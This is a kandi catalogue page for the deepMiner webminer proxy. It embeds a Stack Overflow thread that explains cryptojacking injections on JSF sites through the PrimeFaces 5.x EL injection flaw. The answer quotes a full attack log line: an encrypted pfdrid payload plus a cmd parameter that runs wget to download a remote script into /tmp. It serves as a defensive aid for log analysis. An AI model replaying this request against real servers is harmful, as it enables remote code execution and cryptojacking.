deepMiner | deepMiner webminer proxy | Binary Executable Format library

 by   deepwn C Version: Current License: Non-SPDX

X-RayKey FeaturesCode SnippetsCommunity Discussions(1)VulnerabilitiesInstallSupport

kandi X-RAY | deepMiner Summary

kandi X-RAY | deepMiner Summary

deepMiner is a C library typically used in Programming Style, Binary Executable Format applications. deepMiner has no bugs, it has no vulnerabilities and it has low support. However deepMiner has a Non-SPDX License. You can download it from GitHub.

deepMiner webminer proxy (update for cryptoNight R)
Support
    Quality
      Security
        License
          Reuse

            kandi-support Support

              deepMiner has a low active ecosystem.
              It has 510 star(s) with 232 fork(s). There are 60 watchers for this library.
              OutlinedDot
              It had no major release in the last 6 months.
              There are 0 open issues and 74 have been closed. On average issues are closed in 30 days. There are no pull requests.
              It has a neutral sentiment in the developer community.
              The latest version of deepMiner is current.

            kandi-Quality Quality

              deepMiner has no bugs reported.

            kandi-Security Security

              deepMiner has no vulnerabilities reported, and its dependent libraries have no vulnerabilities reported.

            kandi-License License

              deepMiner has a Non-SPDX License.
              Non-SPDX licenses can be open source with a non SPDX compliant license, or non open source licenses, and you need to review them closely before use.

            kandi-Reuse Reuse

              deepMiner releases are not available. You will need to build from source code and install.
              Installation instructions, examples and code snippets are available.

            Top functions reviewed by kandi - BETA

            kandi's functional review helps you automatically verify the functionalities of the libraries and avoid rework.
            Currently covering the most popular Java, JavaScript and Python libraries. See a Sample of deepMiner
            Get all kandi verified functions for this library.

            deepMiner Key Features

            No Key Features are available at this moment for deepMiner.

            deepMiner Examples and Code Snippets

            No Code Snippets are available at this moment for deepMiner.

            Community Discussions

            Trending Discussions on deepMiner

            JSF Cryptojacking Malware

            QUESTION

            JSF Cryptojacking Malware
            Asked 2018-Jan-20 at 10:09

            Now I know this is not a security or malware removal website. However I feel that this is a JSF specific question,

            I have noticed that my website is being attacked constantly by injecting a JavaScript file into the web page.

            The malware is loading a script file from some random URL that has the following pattern: https://johndi33.*****.***:7777/deepMiner.js.

            The malware is removed upon redeployment of the app, however after some hours the attack is reinitiated and the script is injected.

            Upon some research about this specific cryptojacking malware I found hundreds or thousands of infected websites with the same malware, and I also noticed that all infected websites are JSF based.

            I wonder if there is any awareness about this, or any JSF misconfigurations that would lead to RCE that easily.

            PS - Environment:

            • Ubuntu 16.04

            • Wildfly 10.1

            • Java 8

            ...

            ANSWER

            Answered 2018-Jan-20 at 10:09

            There are no remote code execution vulrenabilities in JSF (Mojarra). See also its CVE summary which lists only a XSS bug in the prehistoric pre-1.2_08 versions.

            Only in PrimeFaces 5.x there was an EL injection hole in the resource handler behind the StreamedContent, the /dynamiccontent.properties. This EL injection hole allowed the attacker to execute code on the server machine. See also its CVE summary which lists exactly this vulrenability. Your question history confirms that you're using PrimeFaces.

            This is already fixed in February 2016 as per PrimeFaces issue 1152 and the fix is available since PrimeFaces 5.2.21 / 5.3.8 / 6.0. In other words, just continuously keep your software up to date.

            That said, this could also easily have been nailed down by analyzing server access logs. Below is an example log entry whereby this vulrenability is been exploited. Note particularly the extraordinary long pfdrid request parameter and the cmd request parameter in a /dynamiccontent.properties request:

            GET /javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&ln=primefaces&pfdrid=4ib88tY5cy3INAZZsdtHPFU0Qzf8xqfq7ScCVr132r36qawXCNDixKdRFB0XZvCTU9npUitDjk1QTkIeQJA4yEY72QT3qDGJpZjuqCDIWniQcr2vJZR%2B005iFZzJ%2Fi7VR9Mx5l5cedTgq9wS03rem26ubch9%2Bq4W6msPwJ1hk0KMefG9yZl3o5nYeA5gvnp9LQJb3r%2BM1yQ00zFBDzT4i9Nsx%2Fs5eaGsq9BFptosdH06iT1k7rn%2BrQtPjyIbOQzOmnMx%2F6THLsOCppRaIG7BW4VRbsIi1gJ8cRh6%2Bad71ukPWbDdM6S6O0Qcr%2FdkssHfL5%2F7y8Xy%2FcyDiiljeZj3dIibq3CSy6RBaZGzRXqjYAyV%2FJ7n3ulIkSVKszrCy3VyWb1uCY0fKLrPd3EO%2Flsw3k%2FbYSofV9MA%2BAaTnD8PXYhmiYGvp9b2R1BQGb8WgFk0fyTITJFZfUTJhM%2BiRJruw9ALDox8MY9S0SnpbmXM3LQmVYSghH0j4Zgi7Te7SZZK6gqgZEkrTA%2BQgAaZRIFG6R810xr5PZoWWG0Fdf9x491vRYtUSet8xCHIofPZ7fS5uP3mi2btGxWy8TgAEyC2wT%2F19mudycgOdTXW9nMt5nOf62fOdKSBYs2jStSwe2a6I6N5Bzp0Z7sdiJ0gmrHiYoJlkyT7p0wWGEk5Q4Xe1EPWIwGZIOr43j6BE7HUP5%2F7KdejsAQzNZZr1ox99VhH1TYwRuH7A7%2BN%2FWheWQCn%2FEM0xlpXC4GssZp4xPVah%2BP9wNH054upTkx4jH8j4houh2UfrjM9Vn18J%2BC1inTqHliDnzu9LFrm5L88eHCnLNDf6cyNmIaom7o2hEoNcffVMJ%2FhWkW7XwVkNS2b0%2B%2B1ZgQXCd7QE0dpIujuJ79keSD1cUyGdgKCVx70vtcbAcfa07Yt3DBPzeIP%2FLQjU6%2F%2BEwTS3oy4gttmMReFb7Bmn0uOUsmGZ%2FKkJNyWwN3wlsEfNFJzLx8%2FtCWjroQVWR0xS0ZudruYXAFmmi9O5iPYjyyQCH8JUrzR4N9vyWffKq1THVtN21EvX7x87Xl908kTe79uh6J61ICVo0PABqIl87m1n7te3d3pZ72PCXetr7GcaElzna95Nfoix9pwJ6GWAjRTcGNPT67lMx7cYKXmTD0mQAzXvlgWi2yEzFt9NA0NFhhZ4m6UeRZ7%2Bgs1Rr0HMpPu%2FNIvaCjTyZRdqRyxrDQ%2FF2QCTxpVEWKYWEEV2t6g%2BQ2m3Xo%2ByyWgeDbY8mHmwkdYUKO3QtwYxXtXTKT9dwCRtE1wDsYjLN0wMdSrg4YX3jCYlt7kV%2FymlnhNoSnVQoDJeumsGI1%2BdmKu2AJY8sGqXo2PJd10CxpQSO6D4F7RxA8fQji8shFybjhRek0YiEXxmvnhsBzCkBCXWguA7RXsMGLrerXVD1wHo5Jf7wQmLOyKUH7nne9ezwzVdQnaqadFehgZ6a6f5d%2FfxIRUZ1tKeLPST16CBlY0%2BPsRQDJJwWrRXdpuwon4PzHQXLD%2BAhQ%2F8j9Mb0OTM8RdZLuRjXw7tcY4muQDwMRCb92ipMiorDO8jVwPPOAXc5waNbSGmRhzOW1%2BLsQpV8OEMKVMDXq5dRoYKz6tlH0Zh4eZTHED3hK8z4cukSTXuxFpdC5NjiVsyhQU71J87Tvkzw1HxbjqhJK%2BkoPySJCmpHOmrrsbNlp0kHtNHuhY&cmd=wget%20http://XXX.XXX.XXX.XXX/CONTACT/test.py%20-O%20/tmp/test.py%20--no-check-certificate HTTP/1.1" 200 1 "-" "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0"

            The pfdrid request parameter normally represents the encrypted value of an EL expression which references a bean property returning the StreamedContent, such as #{bean.image}. However, due to the weak encryption vulrenability (open source 8-byte salt), the attacker can easily supply any arbitrary encrypted string and successfully get it decrypted and finally EL-evaluated.

            When the PrimeFaces 5.x StreamedContentHandler decrypts the above supplied pfdrid example, then the resulting string before EL-evaluation is as below (newlines added for readability):

            Source https://stackoverflow.com/questions/48314621

            Community Discussions, Code Snippets contain sources that include Stack Exchange Network

            Vulnerabilities

            No vulnerabilities reported

            Install deepMiner

            lib request: *nodejs / *npm / ?nginx. ssl support: https://certbot.eff.org/ / https://acme.sh/. OS tested on: ubuntu(debian).

            Support

            And All coins who follow cryptoNight / cryptoNight v7 & v8 / cryptoNight R && pool connect in JSONRPC2Some coins used cryptoNote https://cryptonote.org/coins/ (example: Monero / Electroneum /Sumokoin / Aeon ...)The whitebook: cryptoNight.txt and cryptoNight.md. Come from: https://cryptonote.org/standards/Technology: https://cryptonote.org/inside/
            Find more information at:

            Reuse Trending Solutions

            build-a-realtime-voice-to-image-generator-using-generative-ai
            build-a-realtime-voice-to-image-generator-using-generative-ai
            Build a Realtime Voice-to-Image Generator using Generative AI
            image-resizing-using-opencv-in-python
            image-resizing-using-opencv-in-python
            Image Resizing using OpenCV in Python
            build-your-own-gpt4all-content-generator
            build-your-own-gpt4all-content-generator
            Build your own Custom GPT Content Generator (Open-Source ChatGPT Alternative)
            validate-an-email-address-in-javascript
            validate-an-email-address-in-javascript
            How to Validate an Email Address in JavaScript
            age-calculator-using-javascript
            age-calculator-using-javascript
            Age Calculator using JavaScript
            addressing-bias-in-ai---toolkit-for-fairness,-explainability-and-privacy
            addressing-bias-in-ai---toolkit-for-fairness,-explainability-and-privacy
            Addressing Bias in AI - Toolkit for Fairness, Explainability and Privacy
            javascript-node-js-payment-processing
            javascript-node-js-payment-processing
            15 best JavaScript Node.js Payment libraries
            build-credit-risk-predictor-using-federated-learning
            build-credit-risk-predictor-using-federated-learning
            Build Credit Risk predictor using Federated Learning
            top-10-javascript-tours-and-guides-libraries-in-2023
            top-10-javascript-tours-and-guides-libraries-in-2023
            10 Best JavaScript Tours and Guides Libraries in 2023
            disease-predictor
            disease-predictor
            Disease Predictor using Pandas & Scikit
            python-face-recognition
            python-face-recognition
            28 best Python Face Recognition libraries

            Find, review, and download reusable Libraries, Code Snippets, Cloud APIs from over 650 million Knowledge Items

            Find more libraries
            CLONE
          • HTTPS

            https://github.com/deepwn/deepMiner.git

          • CLI

            gh repo clone deepwn/deepMiner

          • sshUrl

            git@github.com:deepwn/deepMiner.git

            • Stay Updated

            Subscribe to our newsletter for trending solutions and developer bootcamps

            Agree to Sign up and Terms & Conditions

            Share this Page

            share link

            Open Weaver – Develop Applications Faster with Open Source

            kandi

            Community and Support

            Company

            Follow

            • © 2023 Open Weaver Inc.